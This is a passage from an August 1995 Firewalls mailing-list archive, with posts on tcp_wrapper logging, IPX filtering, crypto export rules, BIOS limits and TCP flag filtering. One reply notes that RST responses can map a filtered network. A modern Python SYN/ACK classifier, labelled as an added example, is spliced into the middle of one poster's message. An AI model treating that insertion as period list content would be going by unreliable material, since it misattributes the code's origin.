You can also alarm unused ports with tcp_wrapper, which *does* do identd and all the DNS matchup checks and such. I added some mods a while back to make it also log any data received across the trapped connection, which is mucho instructive when someone is trying to rsh/rlogin around your site. Pull down avian.org:/src/fixkits/README for details; look for tw72.
_H*

From firewalls-owner Fri Aug 11 12:18:38 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA09280 for firewalls-outgoing; Fri, 11 Aug 1995 11:47:24 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA09241 for ; Fri, 11 Aug 1995 11:47:17 -0700
Received: from lobster.wellfleet.com(192.32.253.3) by miles via smap (V1.3) id sma009229; Fri Aug 11 11:46:34 1995
Received: from paperboy.wellfleet.com by lobster.wellfleet.com (4.1/SMI-4.1) id AA17519; Fri, 11 Aug 95 14:44:16 EDT
Received: from BayNetworks.com by paperboy.wellfleet.com (4.1/SMI-4.1) id AA13807; Fri, 11 Aug 95 14:45:30 EDT
From: Post_Office@BayNetworks.com (Post Office)
Reply-To: Post_Office@BayNetworks.com
To: Firewalls@GreatCircle.COM
Subject: NDN: Firewalls-Digest V4 #477
Date: 11 Aug 1995 19:28:56 GMT
Message-Id: <471728126.104277200@BayNetworks.com>
Organization: Bay Networks
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Sorry. Your message could not be delivered to:
David Hakaraia (Mailbox or Conference is full.)

From firewalls-owner Fri Aug 11 12:31:08 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA11553 for firewalls-outgoing; Fri, 11 Aug 1995 12:28:05 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA11515 for ; Fri, 11 Aug 1995 12:27:59 -0700
Received: from services.more.net(128.206.1.214) by miles via smap (V1.3) id sma011501; Fri Aug 11 12:27:26 1995
Received: by services.more.net (4.1/SMI-4.1) id AA00860; Fri, 11 Aug 95 14:26:22 CDT
Date: Fri, 11 Aug 1995 14:26:21 -0500 (CDT)
From: "Frank K. Senter"
Subject: browserphobia
To: firewalls@greatcircle.com
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I read in Cheswick & Bellovin, and also in a red book that's supposed to help me configure a certain firewall, that pointers in WWW retrieved documents could conceivably contain commands that would subvert the client machine. Obviously I can't expect a firewall to protect against such attacks any more than viral infected ftp downloads. For performance I would prefer to provide a socks server function on the firewall.

Has anyone heard of real attempts to use embedded pointers maliciously? What protection do current web browsers provide? From these texts I infer that pointers embedded in html documents are more than simple references to protocol/address/document.

Frank Senter
Senior Information Specialist
Missouri Highway and Transportation Department
P.O. Box 270
Jefferson City MO 65102

From firewalls-owner Fri Aug 11 12:56:59 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA09734 for firewalls-outgoing; Fri, 11 Aug 1995 11:54:41 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA09718 for ; Fri, 11 Aug 1995 11:54:38 -0700
Received: from noc1.mid.net(198.247.250.15) by miles via smap (V1.3) id sma009711; Fri Aug 11 11:53:54 1995
Received: from gaijin.mid.net (gaijin.mid.net [198.247.250.28]) by noc1.mid.net (8.6.10/8.6.9) with ESMTP id NAA18200 for ; Fri, 11 Aug 1995 13:52:46 -0500
Received: (from alan@localhost) by gaijin.mid.net (8.6.10/8.6.9) id NAA06420 for firewalls@greatcircle.com; Fri, 11 Aug 1995 13:52:36 -0500
From: Alan Hannan
Message-Id: <199508111852.NAA06420@gaijin.mid.net>
Subject: IPX firewalls
To: firewalls@greatcircle.com
Date: Fri, 11 Aug 1995 13:52:36 -0500 (CDT)
X-Mailer: ELM [version 2.4 PL23]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 
7bit
Content-Length: 538
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

What firewalls on the market possess the ability to perform proxy operations for IPX? What firewalls possess the ability to do straight through circuit level filtering of IPX?

I realize that a cisco can filter IPX, and I'm curious if there are any commercial products that call themselves "Firewalls" that can do this?

-- 
Alan Hannan                       Email: alan@mid.net
Network Systems Administrator     Voice: (402) 472-0239
MIDnet, Lincoln NOC Office        Fax:   (402) 472-0240
"Even paranoids have enemies" - Kissinger

From firewalls-owner Fri Aug 11 13:31:02 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA12721 for firewalls-outgoing; Fri, 11 Aug 1995 12:44:35 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA12676 for ; Fri, 11 Aug 1995 12:44:27 -0700
Received: from bwh.harvard.edu(134.174.81.34) by miles via smap (V1.3) id sma012631; Fri Aug 11 12:44:18 1995
Received: from hermes.bwh.harvard.edu (hermes.bwh.harvard.edu [134.174.81.39]) by bwh.harvard.edu (8.6.9/8.6.9) with ESMTP id PAA26799; Fri, 11 Aug 1995 15:43:06 -0400
From: Adam Shostack
X-Organization: Brigham & Womens Hospital, A Teaching Affiliate of Harvard Medical School
Received: from localhost (adam@localhost) by hermes.bwh.harvard.edu (8.6.4/8.6.4) id PAA14148; Fri, 11 Aug 1995 15:43:39 -0400
Message-Id: <199508111943.PAA14148@hermes.bwh.harvard.edu>
Subject: Re: Encrypted data across national boundaries???
To: ted@kgbvax.network.com (Ted Doty)
Date: Fri, 11 Aug 1995 15:43:37 -0400 (EDT)
Cc: firewalls@greatcircle.com (Firewalls mailing list)
In-Reply-To: <199508111511.LAA09748@kgbvax.network.com> from "Ted Doty" at Aug 11, 95 11:11:38 am
X-PGP: (New) E794DA91 FD 3C 34 50 FE B4 A0 B8 18 F2 E7 2C A8 2D 29 B8
X-PGP: (Old) 876BD629 70 93 32 D6 36 D4 04 10 40 EC AB 28 A4 1D 0F E2
X-Mailer: ELM [version 2.4 PL24]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 1121
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

What's wrong with using IDEA everywhere? Just don't buy your crypto in the USA; import everything, including the expertise.

(Using DES everywhere also works; there are many firms that sell DES based products outside the US. The NSA wants to spread FUD about DES, but probably would not think about suing a large company. Folks like Phil Zimmermann are the preferred target since they don't have legal departments.)

Adam

Ted Doty writes:
| There doesn't seem to be a single cipher that can be used everywhere (except
| the short list: Libya, North Korea, etc), EXCEPT for banks. This is mostly
| the ITAR, but other places (France for sure; rumors have it that Australia
| also restricts crypto ... can anyone confirm or deny this?) also have their
| own restrictions on crypto use ("Damn it ... that's against the First
| Amendment! It's downright un-american!" ;).
|
| The best you can probably do is use a cipher-agile encryption box that has
| enough variety to be able to satisfy the ITAR and local regulations.

-- 
"It is seldom that liberty of any kind is lost all at once."
-Hume

From firewalls-owner Fri Aug 11 13:55:21 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA15244 for firewalls-outgoing; Fri, 11 Aug 1995 13:15:31 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA15200 for ; Fri, 11 Aug 1995 13:15:23 -0700
Received: from uuneo.neosoft.com(198.64.84.252) by miles via smap (V1.3) id sma015160; Fri Aug 11 13:15:19 1995
Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.6.10/8.6.10) with UUCP id PAA00788 for greatcircle.com!firewalls; Fri, 11 Aug 1995 15:07:59 -0500
Received: by ris1.nmti.com (smail2.5) id AA24416; 11 Aug 95 14:09:52 CDT (Fri)
Received: by sonic.nmti.com; id AA12508; Fri, 11 Aug 1995 14:34:51 -0500
From: peter@nmti.com (Peter da Silva)
Message-Id: <9508111934.AA12508@sonic.nmti.com.nmti.com>
Subject: Re: To OS or 0 2 OS
To: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)
Date: Fri, 11 Aug 1995 14:34:51 -0500 (CDT)
Cc: firewalls@greatcircle.com
In-Reply-To: <9508111654.AA16775@uvs1.orl.mmc.com> from "A. Padgett Peterson, P.E. Information Security" at Aug 11, 95 12:54:23 pm
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Content-Length: 561
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> Is not broken, it does what it was designed to do very well (well, a "100%
> compatible" one will). The BIOS has two major limitations:
> 1) slow access
> 2) fixed "real" (segmented) addressing

I disagree. The BIOS does not do what it was designed to do (provide basic input/output services) at all well. It's not just that it's slow, but it's got basically broken interfaces (for example, it won't address cylinders beyond 1024 on a hard drive), and is missing substantial functionality (it provides less coverage than the CP/M BIOS it was modelled after).
From firewalls-owner Fri Aug 11 14:15:22 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA17790 for firewalls-outgoing; Fri, 11 Aug 1995 13:50:20 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA17759 for ; Fri, 11 Aug 1995 13:50:14 -0700
Received: from lobster.wellfleet.com(192.32.253.3) by miles via smap (V1.3) id sma017752; Fri Aug 11 13:50:03 1995
Received: from paperboy.wellfleet.com by lobster.wellfleet.com (4.1/SMI-4.1) id AA23101; Fri, 11 Aug 95 16:47:40 EDT
Received: from BayNetworks.com by paperboy.wellfleet.com (4.1/SMI-4.1) id AA19608; Fri, 11 Aug 95 16:48:54 EDT
From: Post_Office@BayNetworks.com (Post Office)
Reply-To: Post_Office@BayNetworks.com
To: Firewalls@GreatCircle.COM
Subject: NDN: Firewalls-Digest V4 #478
Date: 11 Aug 1995 21:34:55 GMT
Message-Id: <471703223.104724046@BayNetworks.com>
Organization: Bay Networks
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Sorry. Your message could not be delivered to:
David Hakaraia (Mailbox or Conference is full.)
From firewalls-owner Fri Aug 11 14:30:42 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA16677 for firewalls-outgoing; Fri, 11 Aug 1995 13:34:03 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA16620 for ; Fri, 11 Aug 1995 13:33:52 -0700
From: RROHD1@jcpenney.com
Received: from hermes.jcpenney.com(146.235.0.65) by miles via smap (V1.3) id sma016609; Fri Aug 11 13:33:33 1995
Received: from osiris.jcpenney.com by jcpenney.com (5.0/SMI-SVR4) id AA14751; Fri, 11 Aug 1995 15:31:34 -0500
Received: from rrohd1.jcpenney.com ([128.23.31.91]) by osiris.jcpenney.com (5.0/SMI-SVR4) id AA10714; Fri, 11 Aug 1995 15:32:40 -0500
Date: Fri, 11 Aug 1995 15:32:40 -0500
Message-Id: <9508112032.AA10714@osiris.jcpenney.com>
To: firewalls@greatcircle.com
Subject: Solaris VR4-Basic Security Module
Content-Type: text/plain
Content-Description: Solaris VR4-Basic Security Module
Content-Length: 443
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Robyne Rohde
Senior Auditor
JCPenney Company, Inc., Dallas, Texas
Voice: (214)-431-7128
FAX: (214)-531-7128
InterNet: RROHD1@JCPenney.COM

Has anyone implemented the Basic Security Module that is bundled with SVR4? Is it a worthwhile tool to use? Would implementing some of the security within this module be overkill if we are using the logging capabilities within TCP Wrapper, last log, or syslog?

Any info would be appreciated........
From firewalls-owner Fri Aug 11 14:35:05 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA14646 for firewalls-outgoing; Fri, 11 Aug 1995 13:08:19 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA14544 for ; Fri, 11 Aug 1995 13:08:04 -0700
Received: from scylla.sovam.com(192.216.212.97) by miles via smap (V1.3) id sma014524; Fri Aug 11 13:07:30 1995
Received: from thesun.sovam.com by scylla.sovam.com with SMTP id AA27720 (5.67b8s3p1/IDA-1.5); Sat, 12 Aug 1995 00:03:42 +0400
Received: (from iga@localhost) by thesun.sovam.com (8.6.10/8.6.9) id AAA20163; Sat, 12 Aug 1995 00:01:32 +0400
From: "Igor V. Semenyuk"
Message-Id: <199508112001.AAA20163@thesun.sovam.com>
Subject: Re: Encrypted data across national boundaries???
To: ted@kgbvax.network.com (Ted Doty)
Date: Sat, 12 Aug 1995 00:01:30 +0400 (MMTDST)
Cc: MAHAJAN_VIVEK@tandem.com, firewalls@greatcircle.com
In-Reply-To: <199508111511.LAA09748@kgbvax.network.com> from "Ted Doty" at Aug 11, 95 11:11:38 am
X-Mailer: ELM [version 2.4 PL23]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 867
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> There doesn't seem to be a single cipher that can be used everywhere (except
> the short list: Libya, North Korea, etc), EXCEPT for banks. This is mostly
> the ITAR, but other places (France for sure; rumors have it that Australia
> also restricts crypto ... can anyone confirm or deny this?) also have their
> own restrictions on crypto use ("Damn it ... that's against the First
> Amendment! It's downright un-american!" ;).
>

You can't import crypto hard/soft to Russia without permission from Ministry of External Trade (which as I understand turns it to FAPSI). You also can't use crypto hard/soft without FAPSI's permission to communicate over public networks here. Refer to Yeltsin's Decree of April, 6, 1995.

-- 
Igor V. Semenyuk          Internet: iga@sovam.com
SOVAM Teleport            Phone: +7 095 956 3008
Moscow, Russia

From firewalls-owner Fri Aug 11 14:41:23 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA16668 for firewalls-outgoing; Fri, 11 Aug 1995 13:34:01 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA16618 for ; Fri, 11 Aug 1995 13:33:52 -0700
Received: from cseic.saic.com(139.121.32.135) by miles via smap (V1.3) id sma016606; Fri Aug 11 13:33:02 1995
Received: by cseic.saic.com (4.1/1.34) id AA22579; Fri, 11 Aug 95 16:30:28 EDT
Date: Fri, 11 Aug 95 16:30:28 EDT
From: steveg@cseic.saic.com (Stephen Harold Goldstein)
Message-Id: <9508112030.AA22579@cseic.saic.com>
To: mdr@vodka.sse.att.com
Cc: mjr@iwi.com, firewalls@greatcircle.com
In-Reply-To: <9508101726.AA26472@ig1.att.att.com> (mdr@vodka.sse.att.com)
Subject: Re: SunOS vs Solaris 2 vs Intel/BSD for firewalls
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

mdr@vodka.sse.att.com writes:

>How do they administer the system in multiuser mode? Presumably adding
>users and accounts and such would be disallowed. Also adding undesired
>services such as a telnetd or packet grabber would be disallowed.
>
>Ok then, no maintenance while in multi-user mode. Ouch!

I thought we were discussing the benefits of immutable flags for use in securing Firewall boxes. In that context, there are (or should be) no user accounts that might require administration in multi-user mode. Further, I see the requirement of going to single user mode before the configuration can be changed as a real plus.

Stephen Goldstein
steveg@cseic.saic.com
My first computer: A 24K Atari 800, Rev. A ROMS, November 1980
Disclaimer: That's not what I said.
From firewalls-owner Fri Aug 11 15:06:38 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA20660 for firewalls-outgoing; Fri, 11 Aug 1995 14:25:37 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA20609 for ; Fri, 11 Aug 1995 14:25:28 -0700
From: scott@disclosure.com
Received: from uvs1.orl.mmc.com(141.240.192.10) by miles via smap (V1.3) id sma020558; Fri Aug 11 14:25:19 1995
Received: from UVS1.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA17749; Fri, 11 Aug 95 17:23:52 -0400
Date: Fri, 11 Aug 95 17:23:51 -0400
Message-Id: <9508112123.AA17749@uvs1.orl.mmc.com>
To: padgett@tccslr.dnet.mmc.com
Cc: "peter@ris1.nmti.com"@uvs1.dnet.mmc.com, "firewalls@greatcircle.com"@uvs1.dnet.mmc.com
Subject: Re: To OS or 0 2 OS
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Fri, 11 Aug 1995 padgett@tccslr.dnet.mmc.com wrote:

> Peter writes:
>
> >The only thing any UNIX uses the BIOS for is to load itself into memory. The
> >BIOS interface is *so* broken that no high performance operating system uses
> >it for anything else. NT doesn't use the BIOS ... it has its own drivers.
> >OS/2 will use the BIOS but prefers not to.
>
> Is not broken, it does what it was designed to do very well (well, a "100%
> compatible" one will). The BIOS has two major limitations:
> 1) slow access
> 2) fixed "real" (segmented) addressing

3) Some of the BIOS calls are not re-entrant and cannot be interrupted during their execution. According to what I have been told (I am not a PC programmer by trade, but I have played one on TV! :-), it makes for some very "critical" critical regions. Slow access calls (video I/O was the example given to me) can wreak havoc with schedulers.

scott barman
-- 
scott barman                 DISCLAIMER: I speak to anyone who will listen,
scott@disclosure.com                     and I speak only for myself.
barman@ix.netcom.com
"Micro$oft and Windoze/NT will be the cause of the de-evolution of network
security just as the original PC and BASIC was the cause of the de-evolution
of programming."

From firewalls-owner Fri Aug 11 15:31:32 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA20747 for firewalls-outgoing; Fri, 11 Aug 1995 14:26:38 -0700
Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA20678 for ; Fri, 11 Aug 1995 14:26:27 -0700
Received: from panix.com(198.7.0.2) by miles via smap (V1.3) id sma020664; Fri Aug 11 14:25:49 1995
Received: (from lawnyc@localhost) by panix.com (8.6.12/8.6.12+PanixU1.1) id RAA18961; Fri, 11 Aug 1995 17:23:23 -0400
Date: Fri, 11 Aug 1995 17:23:23 -0400 (EDT)
From: "John A. Young"
To: padgett@tccslr.dnet.mmc.com
cc: firewalls-digest@GreatCircle.COM
Subject: Encrypted data across national boundaries
In-Reply-To: <199508111631.JAA01234@miles.greatcircle.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Fri, 11 Aug 1995 padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) wrote:

> 1) Contrary to popular belief I am an engineer, not a lawyer.
>
> 2) The issue is not a single one, but rather multiple.
>    a) crypto mechanism
>       i) export from point of origin
>       ii) in transit between country of origin and country of originator
>       iii) import to originator
>       iv) export from originator's site
>       v) in transit from originator's country to recipients country
>       vi) import to each recipient's site
>
>    b) encrypted messages
>       i) within country of origin
>       ii) in transit over intervening areas
>       iii) within country of receipt
>
>    c) legality of use
>       i) in country of origin
>       ii) in country of receipt
>
>I don't get paid for this you know 8*).
Despite your protestations, Padgett, I'd say you are not only a lawyer (albeit perhaps lacking the formal training and bar admission), but a damned good one as well! You'd better be careful about statements such as the last quoted one, though -- they can be considered *most* unlawyerlike and even ethically dubious.

One possible solution to the France/Russia problem which has been floating through my mind as I've followed this thread, is a reversion to old fashioned "code-books". The outgoing message would be translated by word or phrase substitution (perhaps manually or perhaps automated through grep or a word processor's "global replace" function). The translated message could then be sent as clear text and retranslated at the other end. I would want to consult local counsel in the receiving country (I am licensed neither in France nor in Russia), but I would not be surprised to learn that such a procedure would pass muster where a more sophisticated one, such as PGP, would not.

I know that such code books were used by wire services such as Reuters as long ago as the 19th century, though primarily to save on per/word cabling costs rather than for security. This would certainly require more day-to-day work than PGP, though if one translated only the "wheat" of the message, leaving the chaff unchanged, it would probably not be all that cumbersome.

Regards,
John

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
* Providing user-friendly assistance  : LawNYC@panix.com
to techies and others, from NYC and   : John A. Young, J.D. (Yale 1964)
around the world, in dealing with     : P.O. Box 4695
the problems, opportunities and       : New York, NY 10185-4695
plain conundrums encountered when     : (212) 765-2170
interfacing with the arcane worlds    : (718) 875-0337
of business, law and property. *      : (718) 488-7562 (fax)
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
From firewalls-owner Fri Aug 11 15:40:00 1995
Date: Fri, 11 Aug 1995 18:04:41 -29900
From: Nick Simicich
Subject: Re: TCP Header Flags
To: Carsten Schafer
cc: firewalls@GreatCircle.COM, Carsten Schafer
In-Reply-To: <9508111225.aa03131@rosie.software.group.com>

On Fri, 11 Aug 1995, Carsten Schafer wrote:

> I have recently been getting lots of packets with the SYN bit set
> and a combination of PUSH, URG and RST. Our packet filter seems
> to throw away anything with a SYN bit set. I guess I'm wondering
> which packets are considered connection requests by TCP when the packet
> contains a SYN bit. Are packets containing the SYN flag and no others
> considered connection requests? Most of the packets with the other flags
> set seem to be in response to HTTP requests.

The initial request for a TCP connection has the SYN bit set, but not the ACK bit. Every other TCP packet in a connection has the ACK bit set, including the response to the initial SYN, which also has the SYN bit set. So filtration for directional TCP connections usually looks for packets that have SYN but not ACK. Once sequence numbers are agreed on, SYN is no longer sent.

RST, of course, says that either we got a packet for a connection we don't have a record of, or we don't have that socket at all (not 100% sure on the latter, offhand - for UDP this returns ICMP Socket Unreachable).
This means that you can typically probe the topology of a net protected by a packet filtering router even if they have filtered ICMP echo and port unreachable messages to stop ping and traceroute as well as all incoming connections.

By the way, this is quite likely attempts from the HTTPD at the other end to connect to your identd so that they can log userids in the http daemon logs. Are the SYNs consistently aimed at the identd (or perhaps finger) ports?

Nick Simicich - njs@scifi.emi.net - (last choice) njs@bcrvm1.vnet.ibm.com
http://scifi.emi.net/njs.html -- Stop by and Light Up The World!

From firewalls-owner Fri Aug 11 16:03:55 1995
From: adrian@fujitsu.ca (Adrian Chan)
Message-Id: <9508112105.AA01336@falcon>
Subject: tests for firewall
To: firewalls@greatcircle.com
Date: Fri, 11 Aug 1995 17:05:32 -0400

Hi

Can someone please point me to some tests for firewall? I am new in this area.

Thank you in advance.
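The SYN-but-not-ACK rule Nick Simicich explains above, as an added example (not code from any message in this digest): a stateless flag classifier and the inbound policy it supports, run over constructed sample packets that include the SYN+PUSH+URG+RST combination the question mentions. Port numbers and the allowed-port set are assumptions.

```python
# Added example (not code from any message in this digest) showing the
# SYN/ACK rule described above: a connection request is the one segment
# with SYN set and ACK clear; every later segment of a connection carries
# ACK. Flag bit positions follow RFC 793; the sample packets are constructed.

FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20
FLAG_NAMES = {FIN: "FIN", SYN: "SYN", RST: "RST", PSH: "PSH", ACK: "ACK", URG: "URG"}


def flag_names(flags: int) -> str:
    """Render a flag byte as e.g. 'SYN|ACK' for a log line."""
    return "|".join(name for bit, name in FLAG_NAMES.items() if flags & bit) or "none"


def classify(flags: int) -> str:
    """What a stateless filter can infer from the flag bits alone."""
    syn, ack, rst, fin = (bool(flags & b) for b in (SYN, ACK, RST, FIN))
    if syn and (rst or fin):
        # No real stack opens and tears down a connection in one segment;
        # this covers the SYN+PUSH+URG+RST combinations the poster saw.
        return "invalid"
    if syn and not ack:
        return "connection-request"   # first step of the three-way handshake
    if syn and ack:
        return "connection-accept"    # second step: the reply to our own SYN
    if rst:
        return "reset"                # peer has no such connection or socket
    if ack:
        return "established"          # data, FIN or bare ACK on an open connection
    return "invalid"                  # no SYN, ACK or RST: not a legitimate segment


def filter_inbound(packets, allowed_dst_ports):
    """Directional policy of the kind discussed: inbound connection requests
    pass only to listed ports; anything with ACK set is presumed to belong to
    a connection an inside host opened (a stateless filter cannot check that,
    which is why stateful inspection later replaced this rule); malformed
    combinations are dropped and reported."""
    decisions = []
    for pkt in packets:
        kind = classify(pkt["flags"])
        if kind == "connection-request":
            verdict = "pass" if pkt["dport"] in allowed_dst_ports else "drop"
        elif kind in ("connection-accept", "established", "reset"):
            verdict = "pass"
        else:
            verdict = "drop"
        decisions.append((pkt["dport"], flag_names(pkt["flags"]), kind, verdict))
    return decisions


# Constructed inbound sample: a web request, an identd lookup from a remote
# HTTP server, the reply to a connection we opened, data on it, a reset,
# and one of the malformed SYN combinations from the question.
SAMPLE_PACKETS = [
    {"dport": 80,   "flags": SYN},
    {"dport": 113,  "flags": SYN},
    {"dport": 1025, "flags": SYN | ACK},
    {"dport": 1025, "flags": ACK | PSH},
    {"dport": 1026, "flags": RST | ACK},
    {"dport": 25,   "flags": SYN | PSH | URG | RST},
]

ALLOWED_INBOUND = {25, 80}   # assumed policy: mail and web only


def run_sample():
    return filter_inbound(SAMPLE_PACKETS, ALLOWED_INBOUND)


if __name__ == "__main__":
    for dport, names, kind, verdict in run_sample():
        print(f"dport={dport:<5} flags={names:<20} {kind:<19} -> {verdict}")
```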
Adrian
adrian.chan@fujitsu.ca

From firewalls-owner Fri Aug 11 17:00:07 1995
Message-Id: <9508112348.AA14019@cs.umass.edu>
Subject: Re: Encrypted data across national boundaries
To: Firewalls@greatcircle.com
Date: Fri, 11 Aug 1995 19:48:00 -0400 (EDT)
Reply-To: firewalls@greatcircle.com (Firewalls Mailing List)
In-Reply-To: <199508111932.MAA11911@miles.greatcircle.com> from "firewalls-digest-owner@GreatCircle.COM" at Aug 11, 95 12:32:45 pm
From: futplex@pseudonym.com (Futplex)

Just picking a few nits, and offering a pointer or two...

MAHAJAN_VIVEK@tandem.com writes:

# If there is a need to send data
# to about 50 countries (including places such as Russia/China) is there any
# kind of encryption solution either hardware or software that can be used
# across the board? The data will originate from London for Europe, from
# Singapore and Australia for Asia, and from USA for North and South America.

Ted Doty writes:

> As I understand it, The People's Republic of China is now off the "bad guy"
> list, so you can export crypto to it. Not sure what the banking standard
> is there, but I'd be kind of surprised if they don't do DES. Note that
> this still falls under ITAR, so you (probably) need something like RC4 (or
> NSC's cipher NSC1) for non-banking use.
Probably RC4 with keys not much larger than 40 bits (a la the "international" version of Netscape's SSL protocol). What are the key size options for NSC1 ?

> There doesn't seem to be a single cipher that can be used everywhere (except
> the short list: Libya, North Korea, etc), EXCEPT for banks. This is mostly
> the ITAR, but other places (France for sure; rumors have it that Australia
> also restricts crypto ... can anyone confirm or deny this?) also have their
> own restrictions on crypto use ("Damn it ... that's against the First
> Amendment! It's downright un-american!" ;).

I'm not sure what's on your short list, but Russia has required licensing of cryptography since April. (cf. http://www.eff.org/pub/Global/Russia/)

Ross Anderson has recently written about some proposed restrictions in Australia (his article ended up in RISKS), but I haven't seen any indication that legislation/regulation has actually been enacted there (yet). He says some of the spymaster types from the European Union, U.S., Japan, Australia, and South Africa held a conference recently to discuss tripping up crypto.

[...and in a later message...]

> If US company's MIS called the french company's MIS and told them to download
> PGP (say, from Finland), probably both MIS departments would get an all-
> expenses vacation in the local prison. The US guys for violation of ITAR,
> the french for practicing encryption without a license.

IANAL, but I'm pretty sure the former assertion is not true. Telling someone outside North America that they can get ITAR-controlled cryptography at, say, ftp://ftp.dsi.unimi.it/pub/security/crypt/PGP does not constitute export. (See ftp://ftp.csn.net/mpj/getpgp.asc for other sites and info.)

I would be interested in pointers to evidence of denied crypto license requests by the French govt., but I think Brent would agree that they would not be relevant to firewalls.
BTW, the full text of the ITAR is available at ftp://ftp.cygnus.com/pub/export/itar.in.full

-Futplex

From firewalls-owner Fri Aug 11 18:00:02 1995
Date: Sat, 12 Aug 1995 08:52:57 +0800 (SST)
From: Roland Yeo
To: Tham Huei Hwan
cc: firewalls@GreatCircle.COM
Subject: Re: Internet

Hi Huei Hwan,

if you are interested in security information, you can find a lot of it at the ftp site: coast.cs.purdue.edu

Is your company considering implementing a firewall solution..?

regards,
roland
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Roland Yeo
Delteq Systems
Phone: 65-2720806
Fax: 65-2739159

On Fri, 11 Aug 1995, Tham Huei Hwan wrote:

> Hi,
>
> I am new in this mailing list and also new in internet, anybody can
> inform me where can get the information from the internet or by e-mail ?
>
> Thank You.
> E-mail: Tham.Huei.Hwan@bass.com.my

From firewalls-owner Fri Aug 11 18:36:26 1995
Date: Fri, 11 Aug 95 21:02:07 -0400
Message-Id: <9508120102.AA18333@uvs1.orl.mmc.com>
From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)
To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com
Subject: Re: aTTaCks

Brent rites:

> "Think like a cracker" is an interesting exercise, but it's just that: an
> exercise.

Agree completely. Protecting a system takes a very different mindset from breaking in (though it helps to know the common mechanisms). Some differences are:

    Defender                         Attacker
    must know every node on net      just needs to know a few
    must not interfere with use      rarely cares
    must understand all activity     just needs one

Not to say the defender does not start out with an advantage since can just ask, attacker must test/social engineer.

Now when I go through a system, the process is really very boring - must identify every net, every subnet, every node/router/bridge/gatorbox since any paper census is *always* wrong. Add in the fact that I need to pay as much attention to IPX as IP and AppleShare/DECNet/Vines as well & things get tedious - fortunately they can be automated.

Once this is done I check every node - here I have another advantage over most attackers: 10 ms RTT instead of 1000.
Is practical to try all popular ports, not just NFS or RPC, and have been surprised a few times (like the admin who liked to put an "interesting" banner on a high four digits port on the Ciscos).

But the fact is that while it is nice to be able to crack in in seconds sometimes, just to convince people that they really are not as secure as they thought, it is really the booooring stuff that provides protection.

Warmly,
Padgett

From firewalls-owner Fri Aug 11 18:51:28 1995
From: Jaime Alberto Botello Cantu
To: "firewalls@greatcircle.com", "'kurz@pc08.muc.telenet.de'"
Subject: RE: Which firewall has best management?
Date: Fri, 11 Aug 1995 16:14:03 -0000

I would like to know this too

Thanks in advance

----------
From: kurz@pc08.muc.telenet.de[SMTP:kurz@pc08.muc.telenet.de]
Sent: Friday, 11 August 1995 12:07 PM
To: firewalls@greatcircle.com
Subject: Which firewall has best management?

Listening to the discussions for a while, I believe I've got a good impression of most technical features for standalone firewalls.
But imagine the situation in a network consisting of more than one class B address. The network has connections to partner companies and other associated sites. Several routers are used to implement these. Different policies for the attached networks are defined.

